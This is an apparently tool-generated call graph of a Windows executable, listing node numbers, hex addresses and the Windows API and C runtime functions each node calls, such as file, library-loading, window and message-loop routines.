IsThemeActive 104247->104248 104249 193382 104247->104249 104344 1b52b3 104248->104344 104262 1b0d02 GetModuleHandleW 104249->104262 104251 193352 104350 1b5319 104251->104350 104253 193359 104357 1932e6 SystemParametersInfoW SystemParametersInfoW 104253->104357 104255 193360 104358 19338b 104255->104358 104257 193368 SystemParametersInfoW 104257->104249 105156 1b4f3f 104258->105156 104261->104210 104262->104218 104263->104220 104264->104223 104265->104200 104267->104227 104268->104230 104273 1cd576 104269->104273 104272 1b302d 8 API calls 3 library calls 104272->104229 104274 1cd593 104273->104274 104277 1cd58f 104273->104277 104274->104277 104280 1c4eb8 104274->104280 104285 1c4f6e 104274->104285 104276 1b0248 104276->104233 104276->104272 104297 1b0dfc 104277->104297 104282 1c4ebf 104280->104282 104281 1c4f02 GetStdHandle 104281->104282 104282->104281 104283 1c4f6a 104282->104283 104284 1c4f15 GetFileType 104282->104284 104283->104274 104284->104282 104286 1c4f7a BuildCatchObjectHelperInternal 104285->104286 104304 1c32d1 EnterCriticalSection 104286->104304 104288 1c4f81 104305 1c5422 104288->104305 104290 1c4f90 104296 1c4f9f 104290->104296 104318 1c4e02 29 API calls 104290->104318 104293 1c4f9a 104294 1c4eb8 2 API calls 104293->104294 104294->104296 104295 1c4fb0 __fread_nolock 104295->104274 104319 1c4fbb LeaveCriticalSection _abort 104296->104319 104298 1b0e07 IsProcessorFeaturePresent 104297->104298 104299 1b0e05 104297->104299 104301 1b0fce 104298->104301 104299->104276 104341 1b0f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 104301->104341 104303 1b10b1 104303->104276 104304->104288 104306 1c542e BuildCatchObjectHelperInternal 104305->104306 104307 1c543b 104306->104307 104308 1c5452 104306->104308 104328 1bf649 20 API calls _abort 104307->104328 104320 1c32d1 EnterCriticalSection 104308->104320 104311 1c5440 104329 1c2b5c 26 API calls _abort 104311->104329 104313 1c544a __fread_nolock 104313->104290 104314 1c548a 104330 1c54b1 LeaveCriticalSection _abort 104314->104330 104315 1c545e 104315->104314 104321 1c5373 104315->104321 104318->104293 104319->104295 104320->104315 104331 1c4ff0 104321->104331 104323 1c5385 104327 1c5392 104323->104327 104338 1c3778 11 API calls 2 library calls 104323->104338 104324 1c2d38 _free 20 API calls 104325 1c53e4 104324->104325 104325->104315 104327->104324 104328->104311 104329->104313 104330->104313 104336 1c4ffd _abort 104331->104336 104332 1c503d 104340 1bf649 20 API calls _abort 104332->104340 104333 1c5028 RtlAllocateHeap 104334 1c503b 104333->104334 104333->104336 104334->104323 104336->104332 104336->104333 104339 1b521d 7 API calls 2 library calls 104336->104339 104338->104323 104339->104336 104340->104334 104341->104303 104343 1b0cdc GetStartupInfoW 104342->104343 104343->104246 104345 1b52bf BuildCatchObjectHelperInternal 104344->104345 104407 1c32d1 EnterCriticalSection 104345->104407 104347 1b52ca pre_c_initialization 104408 1b530a 104347->104408 104349 1b52ff __fread_nolock 104349->104251 104351 1b533f 104350->104351 104352 1b5325 104350->104352 104351->104253 104352->104351 104412 1bf649 20 API calls _abort 104352->104412 104354 1b532f 104413 1c2b5c 26 API calls _abort 104354->104413 104356 1b533a 104356->104253 104357->104255 104359 19339b __wsopen_s 104358->104359 104360 19bf73 22 API calls 104359->104360 104361 1933a7 GetCurrentDirectoryW 104360->104361 104414 194fd9 104361->104414 104363 1933ce IsDebuggerPresent 104364 1933dc 104363->104364 104365 1d3ca3 MessageBoxA 104363->104365 104366 1d3cbb 104364->104366 104367 1933f0 104364->104367 104365->104366 104518 194176 22 API calls 104366->104518 104482 193a95 104367->104482 104371 193462 104376 1d3cec SetCurrentDirectoryW 104371->104376 104377 19346a 104371->104377 104376->104377 104378 193475 104377->104378 104519 1f1fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 104377->104519 104514 1934d3 7 API calls 104378->104514 104381 1d3d07 104381->104378 104384 1d3d19 104381->104384 104386 195594 24 API calls 104384->104386 104385 19347f 104388 19396b 61 API calls 104385->104388 104390 193494 104385->104390 104387 1d3d22 104386->104387 104389 19b329 22 API calls 104387->104389 104388->104390 104392 1d3d30 104389->104392 104391 1934af 104390->104391 104393 193907 Shell_NotifyIconW 104390->104393 104397 1934b6 SetCurrentDirectoryW 104391->104397 104394 1d3d5f 104392->104394 104395 1d3d38 104392->104395 104393->104391 104398 196b7c 22 API calls 104394->104398 104396 196b7c 22 API calls 104395->104396 104399 1d3d43 104396->104399 104400 1934ca 104397->104400 104401 1d3d5b GetForegroundWindow ShellExecuteW 104398->104401 104520 197bb5 22 API calls 104399->104520 104400->104257 104405 1d3d90 104401->104405 104404 1d3d51 104406 196b7c 22 API calls 104404->104406 104405->104391 104406->104401 104407->104347 104411 1c3319 LeaveCriticalSection 104408->104411 104410 1b5311 104410->104349 104411->104410 104412->104354 104413->104356 104415 19bf73 22 API calls 104414->104415 104416 194fef 104415->104416 104521 1963d7 104416->104521 104418 19500d 104419 19bd57 22 API calls 104418->104419 104420 195021 104419->104420 104421 19bed9 22 API calls 104420->104421 104422 19502c 104421->104422 104535 19893c 104422->104535 104425 19b329 22 API calls 104426 195045 104425->104426 104427 19be2d 40 API calls 104426->104427 104428 195055 104427->104428 104429 19b329 22 API calls 104428->104429 104430 19507b 104429->104430 104431 19be2d 40 API calls 104430->104431 104432 19508a 104431->104432 104433 19bf73 22 API calls 104432->104433 104434 1950a8 104433->104434 104538 1951ca 104434->104538 104437 1b4d98 _strftime 40 API calls 104438 1950c2 104437->104438 104439 1950cc 104438->104439 104440 1d4b23 104438->104440 104441 1b4d98 _strftime 40 API calls 104439->104441 104442 1951ca 22 API calls 104440->104442 104443 1950d7 104441->104443 104444 1d4b37 104442->104444 104443->104444 104445 1950e1 104443->104445 104447 1951ca 22 API calls 104444->104447 104446 1b4d98 _strftime 40 API calls 104445->104446 104448 1950ec 104446->104448 104449 1d4b53 104447->104449 104448->104449 104450 1950f6 104448->104450 104451 195594 24 API calls 104449->104451 104452 1b4d98 _strftime 40 API calls 104450->104452 104453 1d4b76 104451->104453 104454 195101 104452->104454 104455 1951ca 22 API calls 104453->104455 104456 19510b 104454->104456 104457 1d4b9f 104454->104457 104458 1d4b82 104455->104458 104459 19512e 104456->104459 104462 19bed9 22 API calls 104456->104462 104460 1951ca 22 API calls 104457->104460 104461 19bed9 22 API calls 104458->104461 104464 1d4bda 104459->104464 104468 197e12 22 API calls 104459->104468 104463 1d4bbd 104460->104463 104465 1d4b90 104461->104465 104466 195121 104462->104466 104467 19bed9 22 API calls 104463->104467 104470 1951ca 22 API calls 104465->104470 104471 1951ca 22 API calls 104466->104471 104472 1d4bcb 104467->104472 104469 19513e 104468->104469 104473 198470 22 API calls 104469->104473 104470->104457 104471->104459 104474 1951ca 22 API calls 104472->104474 104475 19514c 104473->104475 104474->104464 104544 198a60 104475->104544 104477 19893c 22 API calls 104479 195167 104477->104479 104478 198a60 22 API calls 104478->104479 104479->104477 104479->104478 104480 1951ab 104479->104480 104481 1951ca 22 API calls 104479->104481 104480->104363 104481->104479 104483 193aa2 __wsopen_s 104482->104483 104484 193abb 104483->104484 104485 1d40da ___scrt_fastfail 104483->104485 104486 195851 23 API calls 104484->104486 104487 1d40f6 GetOpenFileNameW 104485->104487 104488 193ac4 104486->104488 104489 1d4145 104487->104489 104560 193a57 104488->104560 104491 198577 22 API calls 104489->104491 104493 1d415a 104491->104493 104493->104493 104495 193ad9 104578 1962d5 104495->104578 105155 193624 7 API calls 104514->105155 104516 19347a 104517 1935b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104516->104517 104517->104385 104518->104371 104519->104381 104520->104404 104522 1963e4 __wsopen_s 104521->104522 104523 198577 22 API calls 104522->104523 104524 196416 104522->104524 104523->104524 104534 19644c 104524->104534 104555 19655e 104524->104555 104526 19b329 22 API calls 104527 196543 104526->104527 104530 196a7c 22 API calls 104527->104530 104528 19b329 22 API calls 104528->104534 104529 19655e 22 API calls 104529->104534 104531 19654f 104530->104531 104531->104418 104532 196a7c 22 API calls 104532->104534 104533 19651a 104533->104526 104533->104531 104534->104528 104534->104529 104534->104532 104534->104533 104536 1b014b 22 API calls 104535->104536 104537 195038 104536->104537 104537->104425 104539 1951f2 104538->104539 104540 1951d4 104538->104540 104542 198577 22 API calls 104539->104542 104541 1950b4 104540->104541 104543 19bed9 22 API calls 104540->104543 104541->104437 104542->104541 104543->104541 104545 198a76 104544->104545 104546 1d6737 104545->104546 104552 198a80 104545->104552 104558 1ab7a2 22 API calls 104546->104558 104547 1d6744 104559 19b4c8 22 API calls 104547->104559 104550 1d6762 104550->104550 104551 198b94 104553 1b014b 22 API calls 104551->104553 104552->104547 104552->104551 104554 198b9b 104552->104554 104553->104554 104554->104479 104556 19c2c9 22 API calls 104555->104556 104557 196569 104556->104557 104557->104524 104558->104547 104559->104550 104561 1d22d0 __wsopen_s 104560->104561 104562 193a64 GetLongPathNameW 104561->104562 104563 198577 22 API calls 104562->104563 104564 193a8c 104563->104564 104565 1953f2 104564->104565 104566 19bf73 22 API calls 104565->104566 104567 195404 104566->104567 104568 195851 23 API calls 104567->104568 104569 19540f 104568->104569 104570 19541a 104569->104570 104571 1d4d5b 104569->104571 104572 196a7c 22 API calls 104570->104572 104576 1d4d7d 104571->104576 104614 1ae36b 41 API calls 104571->104614 104574 195426 104572->104574 104608 191340 104574->104608 104577 195439 104577->104495 104615 196679 104578->104615 104581 1d5336 104740 2036b8 104581->104740 104583 196679 94 API calls 104585 19630e 104583->104585 104584 1d5347 104586 1d5368 104584->104586 104587 1d534b 104584->104587 104585->104581 104588 196316 104585->104588 104592 1b017b 22 API calls 104586->104592 104789 1966e7 104587->104789 104589 196322 104588->104589 104590 1d5353 104588->104590 104637 193b39 104589->104637 104795 1fe30e 82 API calls 104590->104795 104607 1d53ad 104592->104607 104596 1d5361 104596->104586 104597 1d555e 104602 1d5566 104597->104602 104598 1966e7 68 API calls 104598->104602 104602->104598 104797 1fa215 82 API calls __wsopen_s 104602->104797 104604 19b329 22 API calls 104604->104607 104607->104597 104607->104602 104607->104604 104766 1f9ff8 104607->104766 104769 201519 104607->104769 104775 19bba9 104607->104775 104783 195d21 104607->104783 104796 1f9f27 42 API calls _wcslen 104607->104796 104609 191352 104608->104609 104613 191371 __fread_nolock 104608->104613 104611 1b017b 22 API calls 104609->104611 104610 1b014b 22 API calls 104612 191388 104610->104612 104611->104613 104612->104577 104613->104610 104614->104571 104798 19663e LoadLibraryA 104615->104798 104620 1d5648 104622 1966e7 68 API calls 104620->104622 104621 1966a4 LoadLibraryExW 104806 196607 LoadLibraryA 104621->104806 104624 1d564f 104622->104624 104627 196607 3 API calls 104624->104627 104629 1d5657 104627->104629 104628 1966ce 104628->104629 104630 1966da 104628->104630 104827 19684a 104629->104827 104631 1966e7 68 API calls 104630->104631 104633 1962fa 104631->104633 104633->104581 104633->104583 104636 1d567e 104638 1d415f 104637->104638 104639 193b62 104637->104639 105009 1fa215 82 API calls __wsopen_s 104638->105009 104641 1b017b 22 API calls 104639->104641 104642 193b86 104641->104642 104643 197aab CloseHandle 104642->104643 104644 193b94 104643->104644 104645 19bf73 22 API calls 104644->104645 104648 193b9d 104645->104648 104646 193bfa 104649 19bf73 22 API calls 104646->104649 104647 193bec 104647->104646 104650 1d4179 104647->104650 105010 1fd5aa SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 104647->105010 104651 197aab CloseHandle 104648->104651 104652 193c06 104649->104652 104650->104646 104650->104647 104653 193ba6 104651->104653 104979 193ae9 104652->104979 104656 197aab CloseHandle 104653->104656 104659 193baf 104656->104659 104657 1d41d5 104657->104646 104997 196fa2 SetFilePointerEx SetFilePointerEx SetFilePointerEx CreateFileW CreateFileW 104659->104997 104660 19bf73 22 API calls 104662 193c1e 104660->104662 104666 195851 23 API calls 104662->104666 104663 193bc9 104664 193bd1 104663->104664 104665 1d4591 104663->104665 104998 196c5f 27 API calls messages 104664->104998 105018 1fa215 82 API calls __wsopen_s 104665->105018 104668 193c2c 104666->104668 104984 193b1c 104668->104984 104670 1d45a6 104670->104670 104674 193be3 104999 196c48 SetFilePointerEx SetFilePointerEx SetFilePointerEx 104674->104999 104677 193c6f 104679 19bf73 22 API calls 104677->104679 104678 1d41eb 104680 197aab CloseHandle 104678->104680 104681 193c78 104679->104681 104682 1d41f4 104680->104682 104683 19bf73 22 API calls 104681->104683 104684 196679 94 API calls 104682->104684 104685 193c81 104683->104685 104686 1d421c 104684->104686 105000 19568e 22 API calls 104685->105000 104688 1d4528 104686->104688 104691 2036b8 80 API calls 104686->104691 105015 1fa215 82 API calls __wsopen_s 104688->105015 104689 193c98 105001 197bb5 22 API calls 104689->105001 104693 1d423b 104691->104693 104695 1966e7 68 API calls 104693->104695 104694 193ca9 SetCurrentDirectoryW 104699 193cbc 104694->104699 104696 1d4249 104695->104696 104696->104688 104698 1d4251 104696->104698 104697 193e2a messages 104993 197aab 104697->104993 104700 1b014b 22 API calls 104698->104700 104701 1b017b 22 API calls 104699->104701 104703 193ccf 104701->104703 104706 193e5c 104739 1d4516 104739->104697 104741 2036d4 104740->104741 104742 196874 64 API calls 104741->104742 104743 2036e8 104742->104743 105027 203827 104743->105027 104746 19684a 40 API calls 104747 203717 104746->104747 104748 19684a 40 API calls 104747->104748 104749 203727 104748->104749 104750 19684a 40 API calls 104749->104750 104751 203742 104750->104751 104752 19684a 40 API calls 104751->104752 104753 20375d 104752->104753 104754 196874 64 API calls 104753->104754 104755 203774 104754->104755 104756 1bed7c ___std_exception_copy 21 API calls 104755->104756 104757 20377b 104756->104757 104758 1bed7c ___std_exception_copy 21 API calls 104757->104758 104759 203785 104758->104759 104760 19684a 40 API calls 104759->104760 104761 203799 104760->104761 104762 2032bd 27 API calls 104761->104762 104764 2037af 104762->104764 104763 203700 104763->104584 104764->104763 105033 202c8d 104764->105033 104767 1b017b 22 API calls 104766->104767 104768 1fa028 __fread_nolock 104767->104768 104768->104607 104770 201524 104769->104770 104771 1b014b 22 API calls 104770->104771 104772 20153b 104771->104772 104773 19b329 22 API calls 104772->104773 104774 201546 104773->104774 104774->104607 104776 19bc33 104775->104776 104781 19bbb9 __fread_nolock 104775->104781 104779 1b017b 22 API calls 104776->104779 104777 1b014b 22 API calls 104778 19bbc0 104777->104778 104780 1b014b 22 API calls 104778->104780 104782 19bbde 104778->104782 104779->104781 104780->104782 104781->104777 104782->104607 104784 195d34 104783->104784 104786 195dd8 104783->104786 104785 1b017b 22 API calls 104784->104785 104788 195d66 104784->104788 104785->104788 104786->104607 104787 1b014b 22 API calls 104787->104788 104788->104786 104788->104787 104790 1966f1 104789->104790 104794 1966f8 104789->104794 104791 1be9e8 67 API calls 104790->104791 104791->104794 104792 19670f 104792->104590 104793 1d56a4 FreeLibrary 104794->104792 104794->104793 104795->104596 104796->104607 104797->104602 104799 196674 104798->104799 104800 196656 GetProcAddress 104798->104800 104803 1be95b 104799->104803 104801 196666 104800->104801 104801->104799 104802 19666d FreeLibrary 104801->104802 104802->104799 104835 1be89a 104803->104835 104805 196698 104805->104620 104805->104621 104807 19663b 104806->104807 104808 19661c GetProcAddress 104806->104808 104811 196720 104807->104811 104809 19662c 104808->104809 104809->104807 104810 196634 FreeLibrary 104809->104810 104810->104807 104812 1b017b 22 API calls 104811->104812 104813 196735 104812->104813 104814 19423c 22 API calls 104813->104814 104815 196741 __fread_nolock 104814->104815 104818 1d56c2 104815->104818 104820 19677c 104815->104820 104892 203a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 104815->104892 104893 203a92 74 API calls 104818->104893 104819 19684a 40 API calls 104819->104820 104820->104819 104822 196810 messages 104820->104822 104823 1d5706 104820->104823 104824 196874 64 API calls 104820->104824 104822->104628 104887 196874 104823->104887 104824->104820 104826 19684a 40 API calls 104826->104822 104828 19685c 104827->104828 104829 1d5760 104827->104829 104925 1bec34 104828->104925 104832 2032bd 104962 20310d 104832->104962 104834 2032d8 104834->104636 104838 1be8a6 BuildCatchObjectHelperInternal 104835->104838 104836 1be8b4 104860 1bf649 20 API calls _abort 104836->104860 104838->104836 104840 1be8e4 104838->104840 104839 1be8b9 104861 1c2b5c 26 API calls _abort 104839->104861 104842 1be8e9 104840->104842 104843 1be8f6 104840->104843 104862 1bf649 20 API calls _abort 104842->104862 104852 1c83e1 104843->104852 104846 1be8ff 104847 1be905 104846->104847 104850 1be912 104846->104850 104863 1bf649 20 API calls _abort 104847->104863 104849 1be8c4 __fread_nolock 104849->104805 104864 1be944 LeaveCriticalSection __fread_nolock 104850->104864 104853 1c83ed BuildCatchObjectHelperInternal 104852->104853 104865 1c32d1 EnterCriticalSection 104853->104865 104855 1c83fb 104866 1c847b 104855->104866 104859 1c842c __fread_nolock 104859->104846 104860->104839 104861->104849 104862->104849 104863->104849 104864->104849 104865->104855 104874 1c849e 104866->104874 104867 1c84f7 104868 1c4ff0 _abort 20 API calls 104867->104868 104870 1c8500 104868->104870 104871 1c2d38 _free 20 API calls 104870->104871 104872 1c8509 104871->104872 104875 1c8408 104872->104875 104884 1c3778 11 API calls 2 library calls 104872->104884 104874->104867 104874->104875 104882 1b94fd EnterCriticalSection 104874->104882 104883 1b9511 LeaveCriticalSection 104874->104883 104879 1c8437 104875->104879 104876 1c8528 104885 1b94fd EnterCriticalSection 104876->104885 104886 1c3319 LeaveCriticalSection 104879->104886 104881 1c843e 104881->104859 104882->104874 104883->104874 104884->104876 104885->104875 104886->104881 104888 196883 104887->104888 104889 1d5780 104887->104889 104894 1bf053 104888->104894 104892->104818 104893->104820 104897 1bee1a 104894->104897 104896 196891 104896->104826 104901 1bee26 BuildCatchObjectHelperInternal 104897->104901 104898 1bee32 104922 1bf649 20 API calls _abort 104898->104922 104900 1bee58 104910 1b94fd EnterCriticalSection 104900->104910 104901->104898 104901->104900 104902 1bee37 104923 1c2b5c 26 API calls _abort 104902->104923 104905 1bee64 104911 1bef7a 104905->104911 104907 1bee78 104924 1bee97 LeaveCriticalSection __fread_nolock 104907->104924 104909 1bee42 __fread_nolock 104909->104896 104910->104905 104912 1bef9c 104911->104912 104913 1bef8c 104911->104913 104915 1beea1 28 API calls 104912->104915 104914 1bf649 __dosmaperr 20 API calls 104913->104914 104916 1bef91 104914->104916 104918 1befbf 104915->104918 104916->104907 104917 1bf03e 104917->104907 104918->104917 104919 1bdf7b 62 API calls 104918->104919 104920 1befe6 104919->104920 104921 1c97a4 __fread_nolock 28 API calls 104920->104921 104921->104917 104922->104902 104923->104909 104924->104909 104928 1bec51 104925->104928 104927 19686d 104927->104832 104929 1bec5d BuildCatchObjectHelperInternal 104928->104929 104930 1bec9d 104929->104930 104931 1bec95 __fread_nolock 104929->104931 104937 1bec70 ___scrt_fastfail 104929->104937 104941 1b94fd EnterCriticalSection 104930->104941 104931->104927 104933 1beca7 104942 1bea68 104933->104942 104935 1bec8a 104956 1c2b5c 26 API calls _abort 104935->104956 104955 1bf649 20 API calls _abort 104937->104955 104941->104933 104943 1bea7a ___scrt_fastfail 104942->104943 104948 1bea97 104942->104948 104944 1bea87 104943->104944 104943->104948 104953 1beada __fread_nolock 104943->104953 104958 1bf649 20 API calls _abort 104944->104958 104946 1bea8c 104959 1c2b5c 26 API calls _abort 104946->104959 104957 1becdc LeaveCriticalSection __fread_nolock 104948->104957 104949 1bebf6 ___scrt_fastfail 104961 1bf649 20 API calls _abort 104949->104961 104951 1bdcc5 __fread_nolock 26 API calls 104951->104953 104953->104948 104953->104949 104953->104951 104954 1c90c5 __fread_nolock 38 API calls 104953->104954 104960 1bd2e8 26 API calls 4 library calls 104953->104960 104954->104953 104955->104935 104956->104931 104957->104931 104958->104946 104959->104948 104960->104953 104961->104946 104965 1be858 104962->104965 104964 20311c 104964->104834 104968 1be7d9 104965->104968 104967 1be875 104967->104964 104969 1be7e8 104968->104969 104970 1be7fc 104968->104970 104976 1bf649 20 API calls _abort 104969->104976 104975 1be7f8 __alldvrm 104970->104975 104978 1c36b2 11 API calls 2 library calls 104970->104978 104972 1be7ed 104977 1c2b5c 26 API calls _abort 104972->104977 104975->104967 104976->104972 104977->104975 104978->104975 104980 1d22d0 __wsopen_s 104979->104980 104981 193af6 GetCurrentDirectoryW 104980->104981 104982 198577 22 API calls 104981->104982 104983 193b19 104982->104983 104983->104660 105019 19b120 104984->105019 104987 196d47 104992 196d5e 104987->104992 104988 1d592a SetFilePointerEx 104989 196de5 SetFilePointerEx SetFilePointerEx 104990 193c5e 104989->104990 104990->104677 104990->104678 104991 1d5919 104991->104988 104992->104988 104992->104989 104992->104990 104992->104991 104994 197ab5 104993->104994 104995 197ac4 104993->104995 104994->104706 104995->104994 104996 197ac9 CloseHandle 104995->104996 104996->104994 104997->104663 104998->104674 104999->104647 105000->104689 105001->104694 105009->104647 105010->104657 105015->104739 105018->104670 105020 19b19b 105019->105020 105021 19b12e 105019->105021 105026 1af18b SetFilePointerEx 105020->105026 105022 193b2d 105021->105022 105024 19b16c ReadFile 105021->105024 105022->104987 105024->105022 105025 19b186 105024->105025 105025->105021 105025->105022 105026->105021 105028 20383b 105027->105028 105029 2036fc 105028->105029 105030 19684a 40 API calls 105028->105030 105031 2032bd 27 API calls 105028->105031 105032 196874 64 API calls 105028->105032 105029->104746 105029->104763 105030->105028 105031->105028 105032->105028 105034 202ca6 105033->105034 105035 202c98 105033->105035 105037 202ceb 105034->105037 105038 1be95b 29 API calls 105034->105038 105048 202caf 105034->105048 105036 1be95b 29 API calls 105035->105036 105036->105034 105062 202f16 40 API calls __fread_nolock 105037->105062 105040 202cd0 105038->105040 105040->105037 105041 202cd9 105040->105041 105041->105048 105070 1be9e8 105041->105070 105042 202d2f 105043 202d33 105042->105043 105044 202d54 105042->105044 105047 202d40 105043->105047 105050 1be9e8 67 API calls 105043->105050 105063 202b30 105044->105063 105047->105048 105052 1be9e8 67 API calls 105047->105052 105048->104763 105050->105047 105052->105048 105062->105042 105064 1bed7c ___std_exception_copy 21 API calls 105063->105064 105065 202b3e 105064->105065 105066 1bed7c ___std_exception_copy 21 API calls 105065->105066 105067 202b4f 105066->105067 105068 1bed7c ___std_exception_copy 21 API calls 105067->105068 105071 1be9f4 BuildCatchObjectHelperInternal 105070->105071 105072 1bea1a 105071->105072 105073 1bea05 105071->105073 105075 1bea15 __fread_nolock 105072->105075 105084 1b94fd EnterCriticalSection 105072->105084 105101 1bf649 20 API calls _abort 105073->105101 105075->105048 105077 1bea0a 105102 1c2b5c 26 API calls _abort 105077->105102 105078 1bea36 105085 1be972 105078->105085 105084->105078 105086 1be97f 105085->105086 105087 1be994 105085->105087 105101->105077 105102->105075 105155->104516 105157 1b4f4b _abort 105156->105157 105158 1b4f52 105157->105158 105159 1b4f64 105157->105159 105195 1b5099 GetModuleHandleW 105158->105195 105180 1c32d1 EnterCriticalSection 105159->105180 105162 1b4f57 105162->105159 105196 1b50dd GetModuleHandleExW 105162->105196 105163 1b5009 105184 1b5049 105163->105184 105167 1b4f6b 105167->105163 105169 1b4fe0 105167->105169 105181 1c2518 105167->105181 105170 1b4ff8 105169->105170 105174 1c2791 _abort 5 API calls 105169->105174 105175 1c2791 _abort 5 API calls 105170->105175 105171 1b5052 105204 1d20a9 5 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 105171->105204 105172 1b5026 105187 1b5058 105172->105187 105174->105170 105175->105163 105180->105167 105205 1c2251 105181->105205 105224 1c3319 LeaveCriticalSection 105184->105224 105186 1b5022 105186->105171 105186->105172 105225 1c397f 105187->105225 105190 1b5086 105193 1b50dd _abort 8 API calls 105190->105193 105191 1b5066 GetPEB 105191->105190 105192 1b5076 GetCurrentProcess TerminateProcess 105191->105192 105192->105190 105194 1b508e ExitProcess 105193->105194 105195->105162 105197 1b512a 105196->105197 105198 1b5107 GetProcAddress 105196->105198 105200 1b5139 105197->105200 105201 1b5130 FreeLibrary 105197->105201 105199 1b511c 105198->105199 105199->105197 105202 1b0dfc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 105200->105202 105201->105200 105203 1b4f63 105202->105203 105203->105159 105208 1c2200 105205->105208 105207 1c2275 105207->105169 105209 1c220c BuildCatchObjectHelperInternal 105208->105209 105216 1c32d1 EnterCriticalSection 105209->105216 105211 1c221a 105217 1c22a1 105211->105217 105215 1c2238 __fread_nolock 105215->105207 105216->105211 105218 1c22c1 105217->105218 105221 1c22c9 105217->105221 105219 1b0dfc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 105218->105219 105220 1c2227 105219->105220 105223 1c2245 LeaveCriticalSection _abort 105220->105223 105221->105218 105222 1c2d38 _free 20 API calls 105221->105222 105222->105218 105223->105215 105224->105186 105226 1c399a 105225->105226 105227 1c39a4 105225->105227 105229 1b0dfc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 105226->105229 105232 1c334a 5 API calls 2 library calls 105227->105232 105230 1b5062 105229->105230 105230->105190 105230->105191 105231 1c39bb 105231->105226 105232->105231 105233 1e400f 105248 19eeb0 messages 105233->105248 105234 19f211 PeekMessageW 105234->105248 105235 19ef07 GetInputState 105235->105234 105235->105248 105236 19f0d5 105237 1e32cd TranslateAcceleratorW 105237->105248 105239 19f28f PeekMessageW 105239->105248 105240 19f273 TranslateMessage DispatchMessageW 105240->105239 105241 19f104 timeGetTime 105241->105248 105242 19f2af Sleep 105260 19f2c0 105242->105260 105243 1e4183 Sleep 105243->105260 105244 1e33e9 timeGetTime 105300 1aaa65 23 API calls 105244->105300 105245 1af215 timeGetTime 105245->105260 105246 1fdd87 47 API calls 105246->105260 105248->105234 105248->105235 105248->105236 105248->105237 105248->105239 105248->105240 105248->105241 105248->105242 105248->105243 105248->105244 105262 1a0340 191 API calls 105248->105262 105263 1a2b20 191 API calls 105248->105263 105265 19f450 105248->105265 105272 19f6d0 105248->105272 105295 1ae915 105248->105295 105301 20446f 22 API calls 105248->105301 105302 203fe1 82 API calls __wsopen_s 105248->105302 105249 1e421a GetExitCodeProcess 105253 1e4246 CloseHandle 105249->105253 105254 1e4230 WaitForSingleObject 105249->105254 105251 1e3d51 105255 1e3d59 105251->105255 105252 22345b GetForegroundWindow 105252->105260 105253->105260 105254->105248 105254->105253 105256 1e42b8 Sleep 105256->105248 105260->105245 105260->105246 105260->105248 105260->105249 105260->105251 105260->105252 105260->105256 105303 2160b5 22 API calls 105260->105303 105304 1ff292 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 105260->105304 105262->105248 105263->105248 105266 19f46f 105265->105266 105267 19f483 105265->105267 105305 19e960 105266->105305 105337 203fe1 82 API calls __wsopen_s 105267->105337 105269 19f47a 105269->105248 105271 1e4584 105271->105271 105273 19f6ef 105272->105273 105288 19f7dc messages 105273->105288 105346 1b05b2 5 API calls __Init_thread_wait 105273->105346 105276 1e45d9 105278 19bf73 22 API calls 105276->105278 105276->105288 105277 19bf73 22 API calls 105277->105288 105279 1e45f3 105278->105279 105347 1b0413 29 API calls __onexit 105279->105347 105280 19be2d 40 API calls 105280->105288 105283 1e45fd 105348 1b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 105283->105348 105287 19bed9 22 API calls 105287->105288 105288->105277 105288->105280 105288->105287 105289 1a0340 191 API calls 105288->105289 105290 19fae1 105288->105290 105291 1a1ca0 22 API calls 105288->105291 105292 203fe1 82 API calls 105288->105292 105345 1ab35c 191 API calls 105288->105345 105349 1b05b2 5 API calls __Init_thread_wait 105288->105349 105350 1b0413 29 API calls __onexit 105288->105350 105351 1b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 105288->105351 105352 215231 102 API calls 105288->105352 105353 21731e 191 API calls 105288->105353 105289->105288 105290->105248 105291->105288 105292->105288 105296 1ae959 105295->105296 105297 1ae928 105295->105297 105296->105248 105297->105296 105298 1ae94c IsDialogMessageW 105297->105298 105299 1eeff6 GetClassLongW 105297->105299 105298->105296 105298->105297 105299->105297 105299->105298 105300->105248 105301->105248 105302->105248 105303->105260 105304->105260 105306 1a0340 191 API calls 105305->105306 105311 19e99d 105306->105311 105307 1e31d3 105344 203fe1 82 API calls __wsopen_s 105307->105344 105309 19ea0b messages 105309->105269 105310 19edd5 105310->105309 105323 1b017b 22 API calls 105310->105323 105311->105307 105311->105309 105311->105310 105312 19eac3 105311->105312 105318 19ebb8 105311->105318 105322 1b014b 22 API calls 105311->105322 105332 19eb29 __fread_nolock messages 105311->105332 105312->105310 105314 19eace 105312->105314 105313 19ecff 105316 1e31c4 105313->105316 105317 19ed14 105313->105317 105315 1b014b 22 API calls 105314->105315 105319 19ead5 __fread_nolock 105315->105319 105343 216162 22 API calls 105316->105343 105321 1b014b 22 API calls 105317->105321 105324 1b017b 22 API calls 105318->105324 105325 19eaf6 105319->105325 105326 1b014b 22 API calls 105319->105326 105330 19eb6a 105321->105330 105322->105311 105323->105319 105324->105332 105325->105332 105338 19d260 191 API calls 105325->105338 105326->105325 105328 1e31b3 105342 203fe1 82 API calls __wsopen_s 105328->105342 105330->105269 105332->105313 105332->105328 105332->105330 105333 1e318e 105332->105333 105335 1e316c 105332->105335 105339 1944fe 191 API calls 105332->105339 105341 203fe1 82 API calls __wsopen_s 105333->105341 105340 203fe1 82 API calls __wsopen_s 105335->105340 105337->105271 105338->105332 105339->105332 105340->105330 105341->105330 105342->105330 105343->105307 105344->105309 105345->105288 105346->105276 105347->105283 105348->105288 105349->105288 105350->105288 105351->105288 105352->105288 105353->105288 105354 1bf06e 105355 1bf07a 